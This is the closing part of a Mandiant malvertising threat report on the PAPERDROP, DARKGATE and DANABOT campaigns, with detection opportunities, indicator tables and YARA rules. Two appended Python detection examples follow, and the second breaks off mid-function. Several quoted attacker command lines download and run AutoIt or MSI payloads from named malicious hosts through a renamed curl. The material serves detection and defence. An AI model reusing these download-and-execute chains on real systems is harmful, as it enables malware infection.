\"C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\1\\Temp1_flast_d45534i.zip\\flast_d45534i.vbs\"\r\n\r\nDetection Opportunity: Msiexec installing package located under %ProgramData%\r\nMITRE ATT\u0026CK® Technique(s): T1218.007\r\nParent Process: C:\\Windows\\System32\\wscript.exe\r\nProcess: C:\\Windows\\System32\\msiexec.exe\r\nCommand Line: msiexec /i C:\\programData\\FM40VY7.bin /qn\r\n\r\nDetection Opportunity: AutoIt script file payload downloaded via command line\r\nMITRE ATT\u0026CK® Technique(s): T1105\r\nParent Process: C:\\Windows\\System32\\wscript.exe\r\nProcess: C:\\Windows\\System32\\cmd.exe\r\nCommand Line: \"C:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\yifr \u0026 cd /d c:\\yifr \u0026 copy c:\\windows\\system32\\curl.exe yifr.exe \u0026 yifr -H \"User-Agent: curl\" -o Autoit3.exe http[:]//infocatalog[.]pics:8080 \u0026 yifr -o khscrk.au3 http[:]//infocatalog[.]pics:8080/msiyifrmouv \u0026 Autoit3.exe khscrk.au3\r\n\r\nDetection Opportunity: cURL binary copied via command line\r\nMITRE ATT\u0026CK® Technique(s): T1036.003\r\nParent Process: C:\\Windows\\System32\\cmd.exe\r\nProcess: C:\\Windows\\System32\\copy.exe\r\nCommand Line: copy c:\\windows\\system32\\curl.exe ihcbzhY.exe\r\n\r\nDetection Opportunity: Suspected renamed cURL binary execution\r\nMITRE ATT\u0026CK® Technique(s): T1105, T1036.003\r\nParent Process: C:\\Windows\\System32\\cmd.exe\r\nProcess: c:\\yifr\\yifr.exe\r\nCommand Line: yifr -H \"User-Agent: curl\" -o Autoit3.exe http[:]//infocatalog[.]pics:8080\r\nUser-Agent: curl\r\n\r\nDetection Opportunity: Masquerading cURL downloading MSI file\r\nMITRE ATT\u0026CK® Technique(s): T1105, T1036.003\r\nParent Process: C:\\Windows\\System32\\cmd.exe\r\nProcess: C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\CoNyuYT.exe\r\nCommand Line: CoNyuYT.exe -o QAcyqLqxgu.msi https[:]//plano.soulcarelife[.]org/?n0igoun59hzb3eguo63j1hmjobmjw8\r\n\r\nDetection Opportunity: Schtasks used to stop WININET Cache Task\r\nMITRE ATT\u0026CK® Technique(s): T1053.005\r\nParent Process: C:\\Windows\\SysWOW64\\rundll32.exe\r\nProcess: C:\\Windows\\SysWOW64\\schtasks.exe\r\nCommand Line: schtasks /End /tn \\Microsoft\\Windows\\Wininet\\CacheTask\r\n\r\nDetection Opportunity: Schtasks used to start WININET Cache Task\r\nMITRE ATT\u0026CK® Technique(s): T1053.005\r\nParent Process: C:\\Windows\\SysWOW64\\rundll32.exe\r\nProcess: C:\\Windows\\SysWOW64\\schtasks.exe\r\nCommand Line: schtasks /Run /tn \\Microsoft\\Windows\\Wininet\\CacheTask\r\n\r\nDetection Opportunity: Rundll32 loading DLL file with anomalous extension\r\nMITRE ATT\u0026CK® Technique(s): T1218.011, T1036.008\r\nProcess: C:\\Windows\\system32\\rundll32.exe\r\nCommand Line: \"C:\\WINDOWS\\system32\\RUNDLL32.EXE\" \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella Roaming Client\\CoreReborn32.bin\",start\r\nImage Load: C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella Roaming Client\\CoreReborn32.bin\r\n\r\nDetection Opportunity: Rundll32 modifying local proxy settings\r\nMITRE ATT\u0026CK® Technique(s): T1218.011, T1562\r\nProcess: C:\\Windows\\SysWOW64\\rundll32.exe\r\nRegistry Values (key = data):\r\nHKEY_USERS\\\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer = 127.0.0.1:15064\r\nHKEY_USERS\\\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride = 127.0.0.1\r\n\r\nDetection Opportunity: Registry Run key with Rundll32 command in text value\r\nMITRE ATT\u0026CK® Technique(s): T1547.001, T1218.011\r\nRegistry Key: HKEY_USERS\\\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Srfshu\r\nText Value: \"C:\\WINDOWS\\system32\\RUNDLL32.EXE\" \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella Roaming Client\\CoreReborn32.bin\",start\r\n\r\nDetection Opportunity: Rundll32 process creating Run key persistence\r\nMITRE ATT\u0026CK® Technique(s): T1547.001, T1218.011\r\nProcess: rundll32.exe\r\nRegistry Key: HKEY_USERS\\\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Srfshu\r\nText Value: \"C:\\WINDOWS\\system32\\RUNDLL32.EXE\" \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella Roaming Client\\CoreReborn32.bin\",start\r\n\r\nDetection Opportunity: Rundll32 execution of file under \\AppData\\\r\nMITRE ATT\u0026CK® Technique(s): T1218.011\r\nParent Process: C:\\Windows\\Installer\\MSI4F8C.tmp\r\nProcess: C:\\Windows\\SysWOW64\\rundll32.exe\r\nCommand Line: C:\\WINDOWS\\system32\\rundll32.exe C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Oadsoophotfp.dll,start\r\n\r\nAppendix B: Indicators of Compromise\r\nType | Value | Campaign | Malware Family | Attribution\r\nDomain | www.claimprocessing[.]org | 23-046 | - | UNC2975\r\nDomain | www.treasurydept[.]org | 23-046 | - | UNC2975\r\nDomain | www.assetfinder[.]org | 23-046 | - | UNC2975\r\nDomain | gfind[.]org | 23-046 | - | UNC2975\r\nDomain | claimunclaimed[.]org | 23-046 | - | UNC2975\r\nDomain | treasurydept[.]org | 23-046 | - | UNC2975\r\nDomain | www.myunclaimedcash[.]org | 23-046 | - | UNC2975\r\nDomain | freelookup[.]org | 23-046 | - | UNC2975\r\nDomain | capitalfinders[.]org | 23-046 | - | UNC2975\r\nDomain | plano.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975\r\nDomain | pittsburgh.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975\r\nDomain | durham.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975\r\nDomain | mesa.halibut[.]sbs | 23-046 | PAPERDROP | UNC2975\r\nDomain | arlington.barracudas[.]sbs | 23-046 | PAPERDROP | UNC2975\r\nDomain | lugbara[.]top | 23-046 | PAPERDROP | UNC2975\r\nDomain | lewru[.]top | 23-046 | PAPERDROP | UNC2975\r\nDomain | infocatalog[.]pics | 23-046 | DARKGATE | UNC5085\r\nDomain | bikeontop[.]shop | 23-046 | DARKGATE | UNC5085\r\nDomain | positivereview[.]cloud | 23-046 | DARKGATE | UNC5085\r\nDomain | dreamteamup[.]shop | 23-046 | DARKGATE | UNC5085\r\nDomain | whatup[.]cloud | 23-046 | DARKGATE | 
UNC5085\r\nDomain | thebesttime[.]buzz | 23-046 | DARKGATE | UNC5085\r\nIP Address | 47.253.165[.]1 | 23-046 | - | UNC2975\r\nIP Address | 8.209.99[.]230 | 23-046 | - | UNC2975\r\nIP Address | 47.252.45[.]173 | 23-046 | - | UNC2975\r\nIP Address | 47.252.33[.]131 | 23-046 | - | UNC2975\r\nIP Address | 47.253.141[.]12 | 23-046 | - | UNC2975\r\nIP Address | 34.16.181[.]0 | 23-046 | DANABOT | -\r\nIP Address | 35.247.194[.]72 | 23-046 | DANABOT | -\r\nIP Address | 35.203.111[.]228 | 23-046 | DANABOT | -\r\nIP Address | 94.228.169[.]143 | 23-051 | PAPERTEAR | UNC5085\r\nMD5 | 9f9c5a1269667171e1ac328f7f7f6cb3 | 23-046 | DARKGATE | UNC5085\r\nMD5 | 2c16eafd0023ea5cb8e9537da442047e | 23-046 | PAPERDROP (Type I) | UNC2975\r\nMD5 | 7544f5bb88ad481f720a9d9f94d95b30 | 23-046 | PAPERDROP (Type I) | UNC2975\r\nMD5 | 862a42a91b5734062d47c37fdd80c633 | - | PAPERDROP (Type II) | UNC2956\r\nMD5 | 650b0b12b21e9664d5c771d78738cf9f | - | PAPERTEAR | UNC5085\r\nMD5 | 9120c82b0920b9db39894107b5494ccd | 23-051 | PAPERTEAR | UNC5085\r\n\r\nAppendix C: YARA Rules\r\nrule M_Downloader_PAPERDROP_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $v1_1 = \"missing from UIHFad computer\"\r\n        $v1_2 = \"Dim UIHFad:set UIHFad = CreateObject(\\\"ADODB.Stream\\\")\"\r\n        $v2_1 = \"a = \\\"QJWRWIIPQLYYREESOR\"\r\n        $v2_2 = \"temp = temp + ChrW(Dict.Item(Mid(a,y-1,2)))\"\r\n        $v3_1 = \"ChrW(Dict.Item(Mid(\"\r\n        $v3_2 = \"-1,2)))\"\r\n        $v3_3 = \" Mod 2 = 0 and Dict.count \u003c\u003e 256 then\"\r\n        $v4_1 = \" = CreateObject(\"\r\n        $v4_2 = \" Mod 2 = 0 and \"\r\n        $v4_3 = \"Execute(\"\r\n        $v4_4 = /if \\w+ Mod 2 = 0 and \\w+.count \u003c\u003e \\w+ then[\\x0a\\x0d]{1,2}\\w+.Add Mid\\(\\w+,\\w+-1,2\\),/\r\n    condition:\r\n        uint16(0) != 0x5A4D and (all of ($v1*) or all of ($v2*) or all of ($v3*) or all of ($v4*))\r\n}\r\n\r\nrule M_Downloader_PAPERDROP_2\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $str1 = \"Scripting.Dictionary\"\r\n        $str2 = \"CreateObject\"\r\n        $str3 = \"Execute(\"\r\n        $str4 = \"Mod 2 = 0 and\"\r\n        $str5 = \"WScript.Sleep\"\r\n        $str6 = \"= Timer()\"\r\n        $str7 = \"*Rnd+\"\r\n        $str8 = \"nP = nP \u0026 \\\"C\\\"\"\r\n    condition:\r\n        all of them\r\n}\r\n\r\nrule M_Downloader_PAPERDROP_3\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $str1 = \"vbSystemModal+vbCritical\"\r\n        $str2 = \"CreateObject(\\\"WScript.Shell\\\")\"\r\n        $str3 = \"MSXML2.ServerXMLHTTP\"\r\n        $str4 = \"ADODB.Stream\"\r\n        $str5 = \"winmgmts:Win32_Process\"\r\n        $str8 = \".create\"\r\n    condition:\r\n        all of them\r\n}\r\n\r\nrule M_Downloader_PAPERDROP_4\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $str1 = \"-1,2)\"\r\n        $str2 = \"CreateObject\"\r\n        $str3 = \"Execute(\"\r\n        $str4 = \"Mod 2 = 0 and Dict.count = 256 then\"\r\n        $str5 = \"= \\\"https://\"\r\n    condition:\r\n        all of them\r\n}\r\n\r\nrule M_Downloader_PAPERTEAR_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $s1 = \".setRequestHeader \\\"a\\\", all_process\" ascii\r\n        $s2 = \"CreateObject(\" ascii\r\n        $s3 = \"Select * from Win32_Process\" ascii\r\n        $s4 = \"For Each\" ascii\r\n        $s5 = \"HTTP\" ascii\r\n    condition:\r\n        filesize \u003c 1MB and all of ($s*)\r\n}\r\n\r\nrule M_Downloader_PAPERTEAR_2\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $str1 = \"WinHTTPRequest\" ascii\r\n        $str2 = \"ShellExecute\" ascii\r\n        $str3 = \".Open \\\"post\\\"\" ascii\r\n        $str4 = \".responseText\" ascii\r\n        $str5 = \"Shell.Application\" ascii\r\n    condition:\r\n        all of them and filesize \u003c 5MB\r\n}\r\n\r\nrule M_Backdoor_DARKGATE_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $str1 = \"IF ( NOT FILEEXISTS ( @PROGRAMFILESDIR ) ) AND ( @USERNAME \u003c\u003e \\\"SYSTEM\\\" ) THEN\"\r\n        $str2 = \"BINARYTOSTRING ( \\\"0x\\\" \u0026\"\r\n        $str3 = \"C:\\\\Program Files (x86)\\\\Sophos\"\r\n        $str4 = \"EXECUTE (BINARYTOSTRING ( \\\"0x\"\r\n        $str5 = \"DLLSTRUCTCREATE\"\r\n        $str6 = \"446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C20224322266368722839372926226C6C57696E646F7750726F63222C2022707472222C20446C6C5374727563744765745074722824\"\r\n    condition:\r\n        all of them and filesize \u003c 500KB\r\n}\r\n\r\nrule M_Backdoor_DARKGATE_2\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $str1 = \"IF ( NOT FILEEXISTS ( @PROGRAMFILESDIR ) ) AND ( @USERNAME \u003c\u003e \\\"SYSTEM\\\" ) THEN\"\r\n        $str2 = \"BINARYTOSTRING ( \\\"0x\\\" \u0026\"\r\n        $str3 = \"C:\\\\Program Files (x86)\\\\Sophos\"\r\n        $str4 = \"EXECUTE ( BINARYTOSTRING ( \\\"0x\"\r\n        $str5 = \"DLLSTRUCTCREATE\"\r\n        $str6 = \"00C680A438000045C680A538000000C680A638000049C680A738000000C680A83800004EC680A938000000C680AA38000046\"\r\n        $str7 = \"CF013183C0024B75D28B420403C28BD08BC28BC82B4DD48B5DDC3B8BA00000072A68B45DC8B40288945E48B45E80345E4FF\"\r\n        $str8 = \"446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C20224322266368722839372926226C6C57696E646F7750726F63222C2022707472222C20446C6C5374727563744765745074722824\"\r\n    condition:\r\n        all of them\r\n}\r\n\r\nrule M_Backdoor_DARKGATE_3\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $x1 = \"SYSTEM Elevation: Completed, new DarkGate connection with SYSTEM privileges\" ascii\r\n        $x2 = \"-u 0xDark\" ascii\r\n        $x3 = \"DarkGate\" ascii\r\n        $x4 = \"/c cmdkey /generic:\\\"127.0.0.2\\\" /user:\\\"SafeMode\\\" /pass:\\\"darkgatepassword0\\\"\" ascii\r\n        $s1 = \"c:\\\\temp\\\\crash.txt\" ascii\r\n        $s2 = \"/cookiesfile \\\"\" ascii\r\n        $s3 = \"/c rmdir /s /q \\\"\" ascii\r\n        $s4 = \"/c xcopy /E /I /Y \\\"%s\\\" \\\"%s\\\" \u0026\u0026 exit\" ascii\r\n        $s5 = \"U_MemScan\" ascii\r\n        $s6 = \"U_Google_AD\" ascii\r\n        $s7 = \"untBotUtils\" ascii\r\n        $s8 = \"____padoru____\" ascii\r\n        $s9 = \"u_SysHook\" ascii\r\n        $s10 = \"zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=\" ascii\r\n        $s11 = \"C:\\\\Windows\\\\System32\\\\ntdll.dll\" fullword ascii\r\n        $s12 = /(SYSTEM )?Elevation: (Cannot|I already|AT RAW|FAILURE)/ ascii\r\n        $s13 = /Stub: (WARNING:|Configuration updated:|Global Ping Invoked)/ ascii\r\n    condition:\r\n        (uint16(0) == 0x5a4d and ((3 of ($x*)) or (2 of ($x*) and 3 of ($s*)) or (1 of ($x*) and 5 of ($s*)) or (6 of ($s*)))) or (10 of them)\r\n}\r\n\r\nrule M_Backdoor_DANABOT_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $api1 = \"ZwWow64WriteVirtualMemory64\" wide\r\n        $api2 = \"ConvertStringSecurityDescriptorToSecurityDescriptorW\" wide\r\n        $code1 = { DF 2C 01 DF 28 83 F9 08 7E 11 DF 68 08 83 F9 10 7E 06 DF 68 10 DF 7A 10 DF 7A 08 DF 3A DF 3C 11 }\r\n        $code2 = { 8A 45 AB 04 9F 2C 1A 73 04 }\r\n    condition:\r\n        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of them\r\n}\r\n\r\nimport \"pe\"\r\n\r\nrule M_Backdoor_DANABOT_2\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"\r\n    strings:\r\n        $code = { A1 [4] 05 [4] A3 [4] A1 [4] 2B 05 [4] A3 [4] 83 7D BC 0B }\r\n        $str1 = \"System.Xml.XmlSerializer.dll\" wide\r\n        $str2 = \"System.IO.Log.ni.dll\" wide\r\n        $str3 = \"ncrypt.dll\" wide\r\n    condition:\r\n        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and pe.is_dll() and (pe.exports(\"ServiceMain\") and pe.exports(\"start\")) and all of them\r\n}\r\n\r\nAppendix D: Mandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\n\r\nVID | Name\r\nS100-302 | Malicious Activity Scenario - PAPERDROP and DANABOT Infection Chain, Variant #1\r\nS100-301 | Malicious Activity Scenario - PAPERTEAR and DARKGATE Infection Chain, Variant #1\r\nS100-299 | Malicious Activity Scenario - PAPERDROP and DANABOT Infection Chain, Variant #2\r\nA106-888 | Command and Control - PAPERTEAR, Download File Attempt, Variant #1\r\nA106-781 | Command and Control - UNC2975, DNS Query, Variant #1\r\nA106-890 | Command and Control - UNC2975, DNS Query, Variant #10\r\nA106-782 | Command and Control - UNC2975, DNS Query, Variant #2\r\nA106-884 | Command and Control - UNC2975, DNS Query, Variant #3\r\nA106-872 | Command and Control - UNC2975, DNS Query, Variant #4\r\nA106-882 | Command and Control - UNC2975, DNS Query, Variant #5\r\nA106-873 | Command and Control - UNC2975, DNS Query, Variant #6\r\nA106-886 | Command and Control - UNC2975, DNS Query, Variant #7\r\nA106-875 | Command and Control - UNC2975, DNS Query, Variant #8\r\nA106-874 | Command and Control - UNC2975, DNS Query, Variant #9\r\nA106-784 | Command and Control - UNC2975, PAPERDROP, DNS Query, Variant #1\r\nA106-783 | Command and Control - UNC2975, PAPERDROP, HTTP GET, Variant #1\r\nA106-877 | Host CLI - Launch Run Dialog via CMD\r\nA104-160 | Host CLI - Registry Run Keys\r\nA106-887 | Malicious File Transfer - AUTOIT, Download, Variant #1\r\nA106-891 | Malicious File Transfer - UNC2975, DANABOT Dropper, Download, Variant #1\r\nA106-786 | Malicious File Transfer - UNC2975, DANABOT, Download, Variant #1\r\nA106-785 | Malicious File Transfer - UNC2975, PAPERDROP Zip File, Variant #1\r\nA106-880 | Malicious File Transfer - UNC5085, AUTOIT Script Containing DARKGATE, Variant #1\r\nA151-259 | Protected Theater - DANABOT, Execution\r\nA106-876 | Protected Theater - DANABOT, Stop and Start Wininet Cache Task\r\nA106-879 | Protected Theater - UNC2975, DANABOT Dropper, Download, Variant #1\r\nA106-787 | Protected Theater - UNC2975, DANABOT MSI Dropper, Variant #1\r\nA106-770 | Protected Theater - UNC4962, DARKGATE, Execution, Variant #1\r\nA106-871 | Protected Theater - UNC5085, DARKGATE Installer, Execution, Variant #1\r\n\r\nAcknowledgements\r\nThe authors would like to thank all of the technical reviewers and blog contributors spanning multiple teams, including\r\nManaged Defense Threat Hunting, Advanced Analysis (AA), 
Advanced Practices (AP), Mandiant Intelligence (MI),\r\nGoogle Trust and Safety, Mandiant Communications Center (MCC), and trusted external partners. We’d also like to thank\r\nthe Managed Defense SOC analysts who provided investigative support responding to these campaigns to protect our\r\ncustomers and the Detection Engineering and Automations (DEA) team for contributing detection content to find new\r\nthreats faster and more effectively. Credit for the creation of new Mandiant Security Validation actions goes to Lexie Aytes\r\nand the Validation Research team. And a tip of the hat to Ana Foreman for the timeline graphics.\r\nPosted in: Threat Intelligence, Security \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\n",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors"
	],
	"report_names": [
		"detecting-disrupting-malvertising-backdoors"
	],
	"threat_actors": [
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434211,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d840fb5f1929247ffb5487c46d3026de97479ac8.pdf",
		"text": "https://archive.orkl.eu/d840fb5f1929247ffb5487c46d3026de97479ac8.txt",
		"img": "https://archive.orkl.eu/d840fb5f1929247ffb5487c46d3026de97479ac8.jpg"
	}
}
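
The Appendix A detection opportunities above, expressed as detection logic and run over constructed events. This is an added example, not code from the Mandiant report: the Event fields follow Sysmon-style naming, the sample events are built from the Appendix A command lines with a placeholder user name ("alice") and SID, and a benign msiexec install is included as a control that must produce no hits.

```python
"""Detection logic for the Appendix A opportunities, run over constructed
Sysmon-style process, image-load, file-write and registry events.
Added example: sample events are built from the Appendix A command lines
(user name and SID are placeholders); they are not telemetry from the report."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    kind: str             # "process" | "imageload" | "filewrite" | "registry"
    image: str = ""       # full path of the acting process
    parent: str = ""      # full path of its parent (process events)
    cmdline: str = ""     # process command line
    target: str = ""      # loaded image, written file, or registry value path
    data: str = ""        # registry value data


def _name(path: str) -> str:
    """File name component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


# rundll32 <dll>,<export>: the DLL path may be quoted, the export may be an ordinal (#61)
_RUNDLL = re.compile(r'rundll32\.exe"?\s+"?([^",]+?)"?\s*,\s*(#?\w+)', re.I)
_MSI_PKG = re.compile(r'/i\s+"?([^\s"]+)', re.I)
# curl-style "-o <outfile> <url>", accepting the defanged http[:]// form used in the report
_DOWNLOAD = re.compile(r'\s-o\s+\S+\s+https?(?:\[:\]|:)//', re.I)
# "copy" is a cmd.exe built-in, so the copy of curl.exe appears in cmd.exe's command line
_COPY_CURL = re.compile(r'copy\s+\S*\\curl\.exe\s+\S+', re.I)
_WSH_IN_ZIP = re.compile(r'\.zip\\[^"]*\.(?:vbs|js|wsf)\b', re.I)


def detect(ev: Event) -> List[Tuple[str, str]]:
    """Return (detection name, ATT&CK technique) pairs that the event satisfies."""
    hits = []
    img, parent, low = _name(ev.image), _name(ev.parent), ev.cmdline.lower()
    if ev.kind == "process":
        if img == "msiexec.exe" and (m := _MSI_PKG.search(ev.cmdline)):
            pkg = m.group(1).lower()
            if not pkg.endswith(".msi"):
                hits.append(("msiexec installing package with masquerading extension", "T1218.007, T1036.008"))
            if "\\programdata\\" in pkg:
                hits.append(("msiexec installing package under %ProgramData%", "T1218.007"))
        if img == "rundll32.exe" and (m := _RUNDLL.search(ev.cmdline)):
            dll, export = m.group(1), m.group(2)
            if _name(dll) == "shell32.dll" and export == "#61":
                hits.append(("rundll32 opening the Run dialog via shell32.dll", "T1218.011"))
            if not dll.lower().endswith(".dll"):
                hits.append(("rundll32 loading DLL with anomalous extension", "T1218.011, T1036.008"))
            if "\\appdata\\" in dll.lower():
                hits.append(("rundll32 executing file under \\AppData\\", "T1218.011"))
        if img == "cmd.exe" and _COPY_CURL.search(ev.cmdline):
            hits.append(("cURL binary copied via command line", "T1036.003"))
        if img != "curl.exe" and ('"user-agent: curl"' in low or _DOWNLOAD.search(ev.cmdline)):
            hits.append(("suspected renamed cURL download", "T1105, T1036.003"))
        if "autoit3.exe" in low and ".au3" in low:
            hits.append(("AutoIt script payload run via command line", "T1105"))
        if img == "schtasks.exe" and parent == "rundll32.exe" and "\\wininet\\cachetask" in low:
            hits.append(("schtasks stopping/starting WININET CacheTask from rundll32", "T1053.005"))
        if img == "wscript.exe" and _WSH_IN_ZIP.search(ev.cmdline):
            hits.append(("WSH executing script from inside a compressed archive", "T1059.005, T1204.002"))
    elif ev.kind == "imageload":
        if img == "rundll32.exe" and not ev.target.lower().endswith(".dll"):
            hits.append(("rundll32 image load with anomalous extension", "T1218.011, T1036.008"))
    elif ev.kind == "filewrite":
        if img == "rundll32.exe" and "\\appdata\\local\\temp\\" in ev.target.lower():
            hits.append(("rundll32 file write to %Temp%", "T1218.011"))
    elif ev.kind == "registry":
        key = ev.target.lower()
        if img == "rundll32.exe" and "\\internet settings\\proxy" in key:
            hits.append(("rundll32 modifying local proxy settings", "T1218.011, T1562"))
        if "\\currentversion\\run\\" in key and "rundll32" in ev.data.lower():
            hits.append(("Run key with rundll32 command in value", "T1547.001, T1218.011"))
    return hits


def run(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Flatten hits over an event list as (event index, detection, technique)."""
    return [(i, name, tech) for i, ev in enumerate(events) for name, tech in detect(ev)]


UMBRELLA = r"C:\Users\alice\AppData\Roaming\Cisco Corp\Umbrella Roaming Client\Umbrella Roaming Client\CoreReborn32.bin"
SAMPLE_EVENTS = [  # constructed from Appendix A; "alice" and the SID are placeholders
    Event("process", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\wscript.exe",
          r"msiexec /i C:\programData\HLWOIRTAA9P.bin /qn"),
    Event("process", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
          r'"C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\shell32.dll",#61 22405'),
    Event("process", r"C:\Users\alice\AppData\Local\Temp\CoNyuYT.exe", r"C:\Windows\System32\cmd.exe",
          r"CoNyuYT.exe -o QAcyqLqxgu.msi https[:]//plano.soulcarelife[.]org/?n0igoun59hzb3eguo63j1hmjobmjw8"),
    Event("process", r"C:\Windows\SysWOW64\schtasks.exe", r"C:\Windows\SysWOW64\rundll32.exe",
          r"schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask"),
    Event("process", r"C:\Windows\system32\rundll32.exe",
          cmdline=f'"C:\\WINDOWS\\system32\\RUNDLL32.EXE" "{UMBRELLA}",start'),
    Event("registry", r"C:\Windows\SysWOW64\rundll32.exe",
          target=r"HKEY_USERS\S-1-5-21-1-2-3-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Srfshu",
          data=f'"C:\\WINDOWS\\system32\\RUNDLL32.EXE" "{UMBRELLA}",start'),
    Event("process", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\svchost.exe",
          r"msiexec /i C:\Windows\Installer\update.msi /qn"),  # benign control: no hits expected
]

if __name__ == "__main__":
    for idx, name, tech in run(SAMPLE_EVENTS):
        print(f"event {idx}: {name} [{tech}]")
```

Each check keys on the behaviour the appendix row describes (the package extension and location, the `,export` argument of rundll32, the `-o <file> <url>` shape of a curl invocation regardless of the image name, the parent of schtasks) rather than on the campaign-specific file names, so it keeps firing when the operator rotates names; to use it on real telemetry, map your EDR's process, image-load, file-write and registry records onto Event and feed them to run().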
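
A check on the Appendix C DARKGATE rules, added here and not part of the report. Those rules match hex-digit text inside DARKGATE's AutoIt loader (the arguments of the BINARYTOSTRING("0x...") calls that the same rules also look for), so the long literals only make sense once decoded, and a single stray non-hex character, as can appear when a rule is copied out of a PDF, silently turns a literal into text that never matches. STR6 is the $str6 literal of M_Backdoor_DARKGATE_1 joined onto one line; the rule excerpt and its $-names are constructed for the example.

```python
"""Audit the hex-digit string literals in YARA rules such as the Appendix C
DARKGATE rules: decode the ones that are printable text (hex-encoded AutoIt),
report the ones that are raw machine code, and flag literals that are not
valid hex. Added example; the rule excerpt below is constructed."""
import re
import string
from typing import Dict, Optional

# YARA text string: $name = "..." with backslash escapes allowed inside the quotes
_LITERAL = re.compile(r'(\$\w+)\s*=\s*"((?:[^"\\]|\\.)*)"')
_HEX = set(string.hexdigits)


def decode_hex_literal(hex_text: str) -> Optional[str]:
    """ASCII text behind a run of hex digit pairs, or None if not valid hex or not printable."""
    compact = re.sub(r"\s+", "", hex_text)
    if not compact or len(compact) % 2 or any(c not in _HEX for c in compact):
        return None
    raw = bytes.fromhex(compact)
    return raw.decode("ascii") if all(32 <= b < 127 for b in raw) else None


def audit_hex_literals(rule_text: str, min_len: int = 16) -> Dict[str, str]:
    """Map each hex-looking literal to 'ok: <decoded text | binary | ...>' or 'corrupt: <reason>'."""
    report = {}
    for name, lit in _LITERAL.findall(rule_text):
        compact = re.sub(r"\s+", "", lit)
        if len(compact) < min_len or sum(c in _HEX for c in compact) < 0.9 * len(compact):
            continue  # ordinary text string, not a hex blob
        bad = sorted({c for c in compact if c not in _HEX})
        if bad:
            report[name] = "corrupt: non-hex character(s) " + repr("".join(bad))
        elif len(compact) % 2:
            # an odd digit count is legal for a substring match; it just cannot be decoded whole
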